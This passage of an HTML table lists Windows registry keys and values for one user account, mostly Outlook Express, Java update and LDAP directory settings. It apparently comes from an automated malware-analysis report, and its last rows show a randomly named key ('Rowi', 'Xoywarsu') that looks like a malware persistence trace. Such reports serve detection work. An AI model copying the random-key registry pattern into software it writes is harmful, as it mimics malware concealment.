<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Welcome Message</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Accounts Checked</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Safe Attachments</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Secure Safe Attachments</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Default_CodePage</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00006faf</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News</span></td>
<td><span style="color: black; font-size: xx-small;">Accounts Checked</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules\Mail</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Main</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Settings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Runtime Environment</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Runtime Environment\1.6.0_29</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Runtime Environment\1.6.0_29</span></td>
<td><span style="color: black; font-size: xx-small;">BalloonShown</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateBeginTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:08 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateFinishTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:09 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy</span></td>
<td><span style="color: black; font-size: xx-small;">VersionXmlURL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://javadl-esd.sun.com/update/1.6.0/au-descriptor-1.6.0_35-b10.xml"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateSchedule</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000011</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">UpdateScheduleMinutes</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000001a</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">Frequency</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000020</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX</span></td>
<td><span style="color: black; font-size: xx-small;">LastUpdateInvokedTime</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sat, 22 Sep 2012 16:30:09 GMT"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D\MostRecentApplication</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D\MostRecentApplication</span></td>
<td><span style="color: black; font-size: xx-small;">Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"java.exe"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager</span></td>
<td><span style="color: black; font-size: xx-small;">Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager</span></td>
<td><span style="color: black; font-size: xx-small;">Default LDAP Account</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Active Directory GC"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">PreConfigVer</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">PreConfigVerNTDS</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">ConnectionSettingsMigrated</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts</span></td>
<td><span style="color: black; font-size: xx-small;">AssociatedID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:19,c7,7f,f0,eb,18,71,4b,81,0c,ca,d6,fc,92,08,57,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Active Directory"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Bind DN</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Port</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000cc4</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Resolve Flag</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Secure Connection</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP User Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Base</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Bigfoot Internet Directory Service"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"ldap.bigfoot.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP URL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://www.bigfoot.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Logo</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,62,69,67,66,6f,6f,74,2e,62,6d,70,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VeriSign Internet Directory Service"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"directory.verisign.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP URL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://www.verisign.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Base</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"NULL"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Logo</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,76,65,72,69,73,69,67,6e,2e,62,6d,70,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server ID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">Account Name</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WhoWhere Internet Directory Service"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Server</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"ldap.whowhere.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP URL</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://www.whowhere.com"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Search Return</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Timeout</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:0000003c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Authentication</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Simple Search</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere</span></td>
<td><span style="color: black; font-size: xx-small;">LDAP Logo</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,77,68,6f,77,68,65,72,65,2e,62,6d,70,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Rowi</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Rowi</span></td>
<td><span style="color: black; font-size: xx-small;">Xoywarsu</span></td>
<td></td>
